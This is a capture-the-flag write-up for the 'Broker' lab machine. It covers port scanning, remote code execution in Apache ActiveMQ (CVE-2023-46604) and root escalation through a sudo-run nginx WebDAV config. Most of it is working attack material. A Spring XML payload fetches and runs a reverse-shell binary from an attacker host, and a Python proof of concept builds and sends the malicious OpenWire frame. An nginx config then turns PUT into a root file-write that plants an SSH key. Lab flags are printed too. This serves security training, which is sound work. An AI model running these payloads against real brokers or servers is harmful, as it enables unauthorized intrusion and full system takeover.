[Meachines] [Easy] Broker Apache ActiveMQ RCE + Nginx ngx_http_dav_module Privilege Escalation

Information Gathering

IP Address     Open Ports
10.10.11.243   TCP: 22, 80, 1883, 5672, 8161, 38507, 61613, 61614, 61616

$ ip='10.10.11.243'; itf='tun0'
# Liveness check: plain -sn ping sweep. Combining it with -Pn (as the one-liner originally did)
# makes nmap assume the host is up, so the check would never fail.
$ if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    # masscan prints "Discovered open port 61616/tcp on 10.10.11.243"; field 4 is port/proto
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
        | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
  else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
  fi

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp  open  mqtt
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|_    ActiveMQ/Advisory/Consumer/Topic/#: 
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
38507/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15

Apache ActiveMQ RCE (CVE-2023-46604)

The OpenWire banner on 61616 reports ProviderVersion 5.15.15, which is below the fixed 5.15.16 and therefore affected by CVE-2023-46604. When the broker unmarshals an ExceptionResponse command it takes a class name and a message string from the frame and instantiates that class by reflection with the message as its single String constructor argument. Sending org.springframework.context.support.ClassPathXmlApplicationContext with a URL as the message makes the broker fetch and load an attacker-hosted Spring XML, and the beans in that XML can run arbitrary commands. No authentication is required on the OpenWire port. The exploit used here:

$ wget https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/archive/refs/heads/main.zip

The Spring XML the tool serves (poc-linux.xml) defines a ProcessBuilder bean whose init-method starts the command:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <!-- Spring constructs ProcessBuilder with the list below and then calls start() -->
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>sh</value>
            <value>-c</value>
            <!-- Fetches the reverse-shell binary from the attacker host, saves it as ./reverse and runs it -->
            <value>curl -s -o reverse http://10.10.16.28/reverse; chmod +x ./reverse; ./reverse</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

$ go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.28:9999/poc-linux.xml

-i and -p are the broker's OpenWire address and port; -u is the URL the broker will fetch the Spring XML from. Note the two different attacker ports: the XML is served on 10.10.16.28:9999 while the reverse binary is fetched from 10.10.16.28:80, so both HTTP listeners and the handler for the reverse shell must be up before this command is run. The shell comes back with the privileges of the account running the broker, which can read user.txt.
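What the Go tool actually puts on the wire, as an added example that is not code from the original writeup or from the SaumyajeetDas repository: it builds the size-prefixed OpenWire ExceptionResponse frame that triggers CVE-2023-46604, decodes it back, and flags it the way a network detection would. The target address and XML URL are the ones used in this writeup; the frame layout assumes the default state of a freshly connected broker (loose encoding, size prefix enabled, no WireFormatInfo negotiation), and the allowlist of "expected" throwable packages in the detection helper is a heuristic assumption.

```python
import socket
import struct

EXCEPTION_RESPONSE = 0x1F   # OpenWire data-structure type of ExceptionResponse
SPRING_CONTEXT = "org.springframework.context.support.ClassPathXmlApplicationContext"
# Packages a legitimate ExceptionResponse from an ActiveMQ broker would name (heuristic, assumption)
EXPECTED_THROWABLE_PREFIXES = ("java.", "javax.", "org.apache.activemq.")


def _loose_string(s: str) -> bytes:
    """Loose-encoded OpenWire string: not-null flag, 2-byte big-endian length, UTF-8 bytes."""
    data = s.encode()
    return b"\x01" + struct.pack(">H", len(data)) + data


def build_exception_response(class_name: str, message: str) -> bytes:
    """Frame that makes the broker call new <class_name>(message) while unmarshalling."""
    body = (
        bytes([EXCEPTION_RESPONSE])
        + struct.pack(">I", 0)        # commandId
        + b"\x00"                      # responseRequired = false
        + struct.pack(">I", 0)         # correlationId
        + b"\x01"                      # exception != null
        + _loose_string(class_name)    # class the broker resolves with Class.forName
        + _loose_string(message)       # single String constructor argument (the XML URL)
    )
    return struct.pack(">I", len(body)) + body   # OpenWire size prefix


def parse_exception_response(frame: bytes) -> dict:
    """Inverse of build_exception_response; raises ValueError for anything else."""
    if len(frame) < 5:
        raise ValueError("frame too short")
    (size,) = struct.unpack(">I", frame[:4])
    body = frame[4:4 + size]
    if len(body) != size or body[0] != EXCEPTION_RESPONSE:
        raise ValueError("not a size-prefixed ExceptionResponse frame")
    pos = 1 + 4 + 1 + 4            # past type, commandId, responseRequired, correlationId
    if body[pos] != 1:
        raise ValueError("null exception")
    pos += 1
    strings = []
    for _ in range(2):             # class name, then message
        if body[pos] != 1:
            raise ValueError("null string")
        (n,) = struct.unpack(">H", body[pos + 1:pos + 3])
        strings.append(body[pos + 3:pos + 3 + n].decode())
        pos += 3 + n
    return {"size": size, "class_name": strings[0], "message": strings[1]}


def looks_like_cve_2023_46604(frame: bytes) -> bool:
    """Detection heuristic: an ExceptionResponse naming a class outside the allowlist is suspicious."""
    try:
        parsed = parse_exception_response(frame)
    except ValueError:
        return False
    return not parsed["class_name"].startswith(EXPECTED_THROWABLE_PREFIXES)


def send_frame(host: str, port: int, frame: bytes, timeout: float = 5.0) -> None:
    """Deliver the frame on a fresh connection; no WireFormatInfo handshake is sent first."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(frame)


if __name__ == "__main__":
    import sys
    # usage: python3 openwire_poc.py 10.10.11.243 61616 http://10.10.16.28:9999/poc-linux.xml
    target, port, url = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    send_frame(target, port, build_exception_response(SPRING_CONTEXT, url))
```

The broker instantiates the named class before it ever gets to the stack-trace section of the frame, which is why nothing beyond the two strings needs to be well-formed. The same parser is what a detection would run over traffic to 61616: any ExceptionResponse whose class is a Spring application context is the exploit, whatever URL it carries.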

User.txt

a178c399b0c91839399aa5b98c0c117c

Privilege Escalation: Nginx ngx_http_dav_module

This step needs sudo rights to run nginx as root, which the foothold account has on this box (check with sudo -l), and an nginx build that includes ngx_http_dav_module (nginx -V lists --with-http_dav_module; the Ubuntu nginx-core package has it). With those two conditions, a config that runs the workers as root, serves / as the document root and enables the PUT method turns the web server into an arbitrary root file-write primitive:

$ cat << EOF > /tmp/shell.conf
user root;                 # workers run as root, so PUT writes are performed as root
worker_processes 4;
pid /tmp/nginx.pid;        # writable pid location that does not collide with the real service

events {
    worker_connections 768;
}

http {
    server {
        listen 10031;
        root /;            # document root is the filesystem root
        autoindex on;      # directory listing, useful for browsing /root
        dav_methods PUT;   # ngx_http_dav_module: PUT creates or overwrites files under root
    }
}
EOF

$ sudo nginx -c /tmp/shell.conf

PUT only creates the target file, not its parent directories; if /root/.ssh does not already exist, add create_full_put_path on; to the server block so intermediate directories are created too.

Generate a key pair on the attacker machine and write the public key straight into root's authorized_keys through the PUT handler. The /home/maptnh paths are the attacker's home directory; --data-binary is used instead of -d so curl does not strip newlines from the file, and nginx answers 201 Created (204 No Content if the file already existed) on success:

$ ssh-keygen -t ed25519

$ curl -X PUT http://10.10.11.243:10031/root/.ssh/authorized_keys --data-binary @/home/maptnh/.ssh/id_ed25519.pub

$ ssh root@10.10.11.243 -i /home/maptnh/.ssh/id_ed25519

Root.txt

26eecd6da62a87d2098e474929f93140
